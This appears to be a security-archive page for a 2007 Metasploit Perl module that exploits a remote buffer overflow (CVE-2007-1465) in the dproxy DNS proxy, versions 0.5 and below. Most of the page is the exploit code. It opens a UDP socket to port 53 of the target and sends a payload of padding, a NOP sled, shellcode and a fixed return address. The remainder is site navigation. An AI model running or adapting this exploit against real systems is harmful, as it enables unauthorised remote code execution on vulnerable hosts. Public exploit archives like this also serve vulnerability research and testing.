dproxy.pm.txt

dproxy.pm.txt: Posted Mar 24, 2007; Authored by Alexander Klink | Site cynops.de; MetaSploit exploit for the remote buffer overflow issue in dproxy versions 0.5 and below.; tags | exploit, remote, overflow; advisories | CVE-2007-1465; SHA-256 | 93a48384d4123533a4cf4d4b95a8e2faf0006039c1860712e18e3f39485121bc; Download | Favorite | View

dproxy.pm.txt

# MetaSploit exploit for remote buffer overflow issue in dproxy
# Written in 2007 by Alexander Klink
# (c) 2007 Cynops GmbH
# released under the same license as MSF (Artistic, GPL dual-licensed)
# $Revision: 1.1 $

package Msf::Exploit::dproxy;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Udp;
use Pex::Text;

my $advanced = { };

my $info = {
    'Name'     => 'dproxy v0.1 - v0.5 buffer overflow exploit',
    'Version'  => '$Revision: 1.1 $',

    'Authors' => [ 'Alexander Klink, Cynops GmbH', ],
    'Arch'    => [ 'x86' ],
    'OS'      => [ 'linux'],
    'Priv'    => 0,

    'UserOpts'  => {
        'RHOST' => [1, 'ADDR', 'The target address'],
    },
    'Payload' => {
        'Space'     => 500,
        'BadChars'  => "\x00",
    },
    'Description'  => Pex::Text::Freeform(qq{
      This exploits a buffer overflow in dproxy version 0.1 to 0.5.
    }),
    'Refs' => [
        [ 'CVE', '2007-1465' ],
    ],

    'DefaultTarget' => 0,
    'Targets' => [
        ['Linux', 0xbfffe480],
    ],
    'Keys' => [ 'dproxy' ],
    'DisclosureDate' => 'Mar 20 2007',
};

sub new {
    my $class = shift;
    my $self = $class->SUPER::new(
        {
          'Info'     => $info,
          'Advanced' => $advanced
        }, @_
    );

    return $self;
}

sub Exploit {
  my $self = shift;

  my $targetHost     = $self->GetVar('RHOST');
  my $targetPort     = 53;
  my $targetIndex    = $self->GetVar('TARGET');
  my $srcPort        = $self->GetVar('CPORT');
  my $encodedPayload = $self->GetVar('EncodedPayload');
  my $shellcode      = $encodedPayload->Payload;
  my $target         = $self->Targets->[$targetIndex];

  if (! $self->InitNops(512)) {
      $self->PrintLine("Could not initialize the nop module");
      return;
  }
  my $sock = Msf::Socket::Udp->new(
    'PeerAddr'  => $targetHost,
    'PeerPort'  => $targetPort,
    'LocalPort' => $srcPort,
  );
  if($sock->IsError) {
    $self->PrintLine('Error creating socket: ' . $sock->GetError);
    return;
  }

  $self->PrintLine('Trying ' . $target->[0] . ' (' . $targetHost . ')');

  my $evil = 'A' x 1000 . $self->MakeNops(500) . $shellcode
      . 'A' x (2073 - 1500 - length($shellcode)) . pack('V', $target->[1]);

  $sock->Send($evil);

  return;
}

1;

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

dproxy.pm.txt

dproxy.pm.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

dproxy.pm.txt

Share This

dproxy.pm.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems